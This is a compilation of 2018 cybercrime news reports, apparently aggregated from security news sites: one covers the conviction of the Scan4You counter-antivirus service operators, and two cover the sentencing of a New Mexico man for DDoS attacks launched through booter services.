Scan4You was probably the largest counter anti-virus website, it went offline in May 2017 after authorities arrested two men in Latvia, the Russian national Jurijs Martisevs (36) (aka “Garrik”) and Ruslans Bondars (37) (aka “Borland”).

Both suspects were extradited by the FBI to the United States.

Jurijs Martisevs was traveling to Latvia when he was arrested by authorities and in March he pleaded guilty in a Virginia court to charges of conspiracy and aiding and abetting computer intrusion.

On Wednesday, Bondars was found guilty of conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to commit wire fraud, and computer intrusion with intent to cause damage.

“Ruslans Bondars helped hackers test and improve the malware they then used to inflict hundreds of millions of dollars in losses on American companies and consumers,” said John P. Cronan, Acting Assistant Attorney General of the Justice Department’s Criminal Division.

“Today’s verdict should serve as a warning to those who aid and abet criminal hackers: the Criminal Division and our law enforcement partners consider you to be just as culpable as the hackers whose crimes you enable—and we will work tirelessly to identify you, prosecute you, and seek stiff sentences that reflect the seriousness of your crimes.”

Bondars faces a maximum penalty of 35 years in prison when sentenced on September 21, 2018.

Scan4You was launched in 2009 with the intent to offer a service that helped malware developers to check evasion capabilities of their code.

For a monthly fee, malware authors could upload their samples to the service that test their evasion capabilities against a broad range of anti-virus products.

The service is similar to the legitimate VirusTotal with the difference that Scan4You did not share submissions with the security community.

“Scan4you differed from legitimate antivirus scanning services in multiple ways. For example, while legitimate scanning services share data about uploaded files with the antivirus community and notify their users that they will do so, Scan4you instead informed its users that they could upload files anonymously and promised not to share information about the uploaded files with the antivirus community.” continues the DoJ.

According to the DoJ, crooks used Scan4You’s services to test the infamous Citadel malware that was used in the cyber attack against the retail giant Target.

Even if Scan4You was taken offline, crooks have other ways to test their malware before spreading them in the wild. Law enforcement must remain vigilant to prevent the growth of other similar services.

Man Sentenced to 15 Years in Prison for DDoS Attacks, Firearm Charges
19.5.2018 securityweek  Crime

A New Mexico man has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.

John Kelsey Gammell, 55, used several so-called booter services to launch cyberattacks, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser. His targets included former employers, business competitors, companies that refused to hire him, colleges, law enforcement agencies, courts, banks, and telecoms firms.

Gammell took measures to avoid exposing his real identity online, including through the use of cryptocurrencies to pay for the DDoS attacks and VPNs. However, a couple of taunting emails he sent to his victims during the DDoS attacks – asking if they had any IT issues he could help with – were sent from Gmail and Yahoo addresses that had been accessed from his home IP address.

The man initially rejected a plea deal and his attorney sought the dismissal of the case, but in January he pleaded guilty to one count of conspiracy to commit intentional damage to a protected computer and two counts of being a felon-in-possession of a firearm. Gammell, a convicted felon, admitted having numerous firearms and hundreds of rounds of ammunition.

In addition to the 180-month prison sentence, Gammell will have to pay restitution to victims of his DDoS attacks, but that amount will be determined at a later date.

A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms
19.5.2018 securityaffairs Crime

A New Mexico man admitted being responsible for
DDoS attacks against the websites of former employers, business competitors, and public services.
John Kelsey Gammell, 55, from New Mexico has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.

The man used popular ‘services of “DDoS-for-hire” companies to power DDoS attacks against its victims, cyberattacks, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser.

The list of the victims is long and include business competitors, former employers, law enforcement agencies, courts, banks, telecoms companies, and firms that refused to hire him.

The man used VPN services to hide his identity and cryptocurrency for his payments, but he was identified due to a poor ops sec. The man sent emails to the victims while they were under DDoS attacks and proposed his services to mitigate the problems. The mails were sent from Gmail and Yahoo accounts he accessed from his home without masquerading his real IP address.


The man initially rejected a plea deal, but in January he pleaded guilty to commit intentional damage to a protected computer, admitting to launching DDoS attacks on websites in the United States in the period between July 2015 and March 2017. He also pleaded guilty to two counts of being a felon-in-possession of firearms and ammunition.

The man was condemned to 180-month in jail and will have to compensate the victims of his DDoS attacks, the overall amount will be determined soon.